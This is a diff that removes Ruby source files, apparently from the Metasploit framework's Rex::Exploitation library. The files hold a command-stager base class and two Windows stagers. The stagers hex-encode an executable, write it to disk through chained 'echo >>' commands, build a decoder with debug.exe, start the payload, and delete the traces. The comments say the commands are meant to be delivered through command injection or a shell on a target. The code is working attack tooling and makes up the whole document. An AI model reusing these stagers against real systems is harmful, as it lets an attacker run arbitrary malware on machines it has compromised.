- if (@tempdir == '.')
30
- @tempdir = ''
31
- end
32
-
33
- opts[:linemax] ||= @linemax
34
-
35
- generate_cmds(opts)
36
- end
37
-
38
-
39
- #
40
- # This does the work of actually building an array of commands that
41
- # when executed will create and run an executable payload.
42
- #
43
- def generate_cmds(opts)
44
-
45
- # Initialize an arry of commands to execute
46
- cmds = []
47
-
48
- # Add the exe building commands
49
- cmds += generate_cmds_payload(opts)
50
-
51
- # Add the decoder script building commands
52
- cmds += generate_cmds_decoder(opts)
53
-
54
- compress_commands(cmds, opts)
55
- end
56
-
57
-
58
- #
59
- # Generate the commands to create an encoded version of the
60
- # payload file
61
- #
62
- def generate_cmds_payload(opts)
63
-
64
- # First encode the payload
65
- encoded = encode_payload(opts)
66
-
67
- # Now split it up into usable pieces
68
- parts = slice_up_payload(encoded, opts)
69
-
70
- # Turn each part into a valid command
71
- parts_to_commands(parts, opts)
72
- end
73
-
74
- #
75
- # This method is intended to be override by the child class
76
- #
77
- def encode_payload(opts)
78
- # Defaults to nothing
79
- ""
80
- end
81
-
82
- #
83
- # We take a string of data and turn it into an array of parts.
84
- #
85
- # We save opts[:extra] bytes out of every opts[:linemax] for the parts
86
- # appended and prepended to the resulting elements.
87
- #
88
- def slice_up_payload(encoded, opts)
89
- tmp = encoded.dup
90
-
91
- parts = []
92
- xtra_len = opts[:extra]
93
- xtra_len ||= 0
94
- while (tmp.length > 0)
95
- parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
96
- end
97
-
98
- parts
99
- end
100
-
101
- #
102
- # Combine the parts of the encoded file with the stuff that goes
103
- # before / after it -- example "echo " and " >>file"
104
- #
105
- def parts_to_commands(parts, opts)
106
- # Return as-is
107
- parts
108
- end
109
-
110
-
111
-
112
- #
113
- # Generate the commands that will decode the file we just created
114
- #
115
- def generate_cmds_decoder(opts)
116
- # Defaults to no commands.
117
- []
118
- end
119
-
120
-
121
-
122
- #
123
- # Compress commands into as few lines as possible. Minimizes the number of
124
- # commands to execute while maximizing the number of commands per execution.
125
- #
126
- def compress_commands(cmds, opts)
127
- new_cmds = []
128
- line = ''
129
- concat = cmd_concat_operator
130
-
131
- # We cannot compress commands if there is no way to combine commands on
132
- # a single line.
133
- return cmds if not concat
134
-
135
- cmds.each { |cmd|
136
-
137
- # If this command will fit, concat it and move on.
138
- if ((line.length + cmd.length + concat.length) < opts[:linemax])
139
- line << concat if line.length > 0
140
- line << cmd
141
- next
142
- end
143
-
144
- # The command wont fit concat'd to this line, if we have something,
145
- # we have to add it to the array now.
146
- if (line.length > 0)
147
- new_cmds << line
148
- line = ''
149
- end
150
-
151
- # If it won't fit even after emptying the current line, error out..
152
- if (cmd.length > opts[:linemax])
153
- raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
154
- end
155
-
156
- # It will indeed fit by itself, lets add it.
157
- line << cmd
158
-
159
- }
160
- new_cmds << line if (line.length > 0)
161
-
162
- # Return the final array.
163
- new_cmds
164
- end
165
-
166
- #
167
- # Can be overriden. For exmaple, use for unix use ";" instead
168
- #
169
- def cmd_concat_operator
170
- nil
171
- end
172
-
173
- end
174
- end
175
- end
@@ -1,142 +0,0 @@
1
- ##
2
- # $Id$
3
- ##
4
-
5
- require 'rex/text'
6
- require 'rex/arch'
7
- require 'msf/core/framework'
8
-
9
- module Rex
10
- module Exploitation
11
-
12
- ###
13
- #
14
- # This class provides the ability to create a sequence of commands from an executable.
15
- # When this sequence is ran via command injection or a shell, the resulting exe will
16
- # be written to disk and executed.
17
- #
18
- # This particular version uses debug.exe to assemble a small COM file. The COM will
19
- # take a hex-ascii file, created via echo >>, and decode it to the final binary.
20
- #
21
- # Requires: debug.exe
22
- #
23
- # Written by Joshua J. Drake
24
- #
25
- ###
26
-
27
- class CmdStagerDebugAsm < CmdStagerBase
28
-
29
- def initialize(exe)
30
- super
31
-
32
- @var_decoder_asm = Rex::Text.rand_text_alpha(8) + ".dat"
33
- @var_decoder_com = Rex::Text.rand_text_alpha(8) + ".com"
34
- @var_payload_in = Rex::Text.rand_text_alpha(8) + ".dat"
35
- @var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
36
- @decoder = nil # filled in later
37
- end
38
-
39
-
40
- #
41
- # Override just to set the extra byte count
42
- #
43
- def generate_cmds(opts)
44
- # Set the start/end of the commands here (vs initialize) so we have @tempdir
45
- @cmd_start = "echo "
46
- @cmd_end = ">>#{@tempdir}#{@var_payload_in}"
47
- xtra_len = @cmd_start.length + @cmd_end.length + 1
48
- opts.merge!({ :extra => xtra_len })
49
- super
50
- end
51
-
52
-
53
- #
54
- # Simple hex encoding...
55
- #
56
- def encode_payload(opts)
57
- ret = @exe.unpack('H*')[0]
58
- end
59
-
60
-
61
- #
62
- # Combine the parts of the encoded file with the stuff that goes
63
- # before / after it.
64
- #
65
- def parts_to_commands(parts, opts)
66
-
67
- cmds = []
68
- parts.each do |p|
69
- cmd = ''
70
- cmd << @cmd_start
71
- cmd << p
72
- cmd << @cmd_end
73
- cmds << cmd
74
- end
75
-
76
- cmds
77
- end
78
-
79
-
80
- #
81
- # Generate the commands that will decode the file we just created
82
- #
83
- def generate_cmds_decoder(opts)
84
-
85
- # Allow decoder stub override (needs to input base64 and output bin)
86
- @decoder = opts[:decoder] if (opts[:decoder])
87
-
88
- # Read the decoder data file
89
- f = File.new(@decoder, "rb")
90
- decoder = f.read(f.stat.size)
91
- f.close
92
-
93
- # Replace variables
94
- decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
95
- decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
96
- # NOTE: these two filenames MUST 8+3 chars long.
97
- decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
98
- decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
99
-
100
- # Split it apart by the lines
101
- decoder.split("\n")
102
- end
103
-
104
-
105
- #
106
- # We override compress commands just to stick in a few extra commands
107
- # last second..
108
- #
109
- def compress_commands(cmds, opts)
110
- # Convert the debug script to an executable...
111
- cvt_cmd = ''
112
- if (@tempdir != '')
113
- cvt_cmd << "cd %TEMP% && "
114
- end
115
- cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
116
- cmds << cvt_cmd
117
-
118
- # Convert the encoded payload...
119
- cmds << "#{@tempdir}#{@var_decoder_com}"
120
-
121
- # Make it all happen
122
- cmds << "start #{@tempdir}#{@var_payload_out}"
123
-
124
- # Clean up after unless requested not to..
125
- if (not opts[:nodelete])
126
- cmds << "del #{@tempdir}#{@var_decoder_asm}"
127
- cmds << "del #{@tempdir}#{@var_decoder_com}"
128
- cmds << "del #{@tempdir}#{@var_payload_in}"
129
- # XXX: We won't be able to delete the payload while it is running..
130
- end
131
-
132
- super
133
- end
134
-
135
- # Windows uses & to concat strings
136
- def cmd_concat_operator
137
- " & "
138
- end
139
-
140
- end
141
- end
142
- end
@@ -1,136 +0,0 @@
1
- ##
2
- # $Id$
3
- ##
4
-
5
- require 'rex/text'
6
- require 'rex/arch'
7
- require 'msf/core/framework'
8
-
9
- module Rex
10
- module Exploitation
11
-
12
- ###
13
- #
14
- # This class provides the ability to create a sequence of commands from an executable.
15
- # When this sequence is ran via command injection or a shell, the resulting exe will
16
- # be written to disk and executed.
17
- #
18
- # This particular version uses debug.exe to write a small .NET binary. That binary will
19
- # take a hex-ascii file, created via echo >>, and decode it to the final binary.
20
- #
21
- # Requires: .NET, debug.exe
22
- #
23
- ###
24
-
25
- class CmdStagerDebugWrite < CmdStagerBase
26
-
27
- def initialize(exe)
28
- super
29
-
30
- @var_bypass = Rex::Text.rand_text_alpha(8)
31
- @var_payload = Rex::Text.rand_text_alpha(8)
32
- @decoder = nil # filled in later
33
- end
34
-
35
-
36
- #
37
- # Override just to set the extra byte count
38
- #
39
- def generate_cmds(opts)
40
- # Set the start/end of the commands here (vs initialize) so we have @tempdir
41
- @cmd_start = "echo "
42
- @cmd_end = ">>#{@tempdir}#{@var_payload}"
43
- xtra_len = @cmd_start.length + @cmd_end.length + 1
44
- opts.merge!({ :extra => xtra_len })
45
- super
46
- end
47
-
48
-
49
- #
50
- # Simple hex encoding...
51
- #
52
- def encode_payload(opts)
53
- @exe.unpack('H*')[0]
54
- end
55
-
56
-
57
- #
58
- # Combine the parts of the encoded file with the stuff that goes
59
- # before / after it.
60
- #
61
- def parts_to_commands(parts, opts)
62
-
63
- cmds = []
64
- parts.each do |p|
65
- cmd = ''
66
- cmd << @cmd_start
67
- cmd << p
68
- cmd << @cmd_end
69
- cmds << cmd
70
- end
71
-
72
- cmds
73
- end
74
-
75
-
76
- #
77
- # Generate the commands that will decode the file we just created
78
- #
79
- def generate_cmds_decoder(opts)
80
-
81
- # Allow decoder stub override (needs to input base64 and output bin)
82
- @decoder = opts[:decoder] if (opts[:decoder])
83
-
84
- # Read the decoder data file
85
- f = File.new(@decoder, "rb")
86
- decoder = f.read(f.stat.size)
87
- f.close
88
-
89
- # Replace variables
90
- decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
91
-
92
- # Split it apart by the lines
93
- decoder.split("\n")
94
- end
95
-
96
-
97
- #
98
- # We override compress commands just to stick in a few extra commands
99
- # last second..
100
- #
101
- def compress_commands(cmds, opts)
102
- # Convert the debug script to an executable...
103
- cvt_cmd = ''
104
- if (@tempdir != '')
105
- cvt_cmd << "cd %TEMP% && "
106
- end
107
- cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
108
- cmds << cvt_cmd
109
-
110
- # Rename the resulting binary
111
- cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
112
-
113
- # Converting the encoded payload...
114
- cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
115
-
116
- # Make it all happen
117
- cmds << "start #{@tempdir}#{@var_payload}.exe"
118
-
119
- # Clean up after unless requested not to..
120
- if (not opts[:nodelete])
121
- cmds << "del #{@tempdir}#{@var_bypass}.exe"
122
- cmds << "del #{@tempdir}#{@var_payload}"
123
- # XXX: We won't be able to delete the payload while it is running..
124
- end
125
-
126
- super
127
- end
128
-
129
- # Windows uses & to concat strings
130
- def cmd_concat_operator
131
- " & "
132
- end
133
-
134
- end
135
- end
136
- end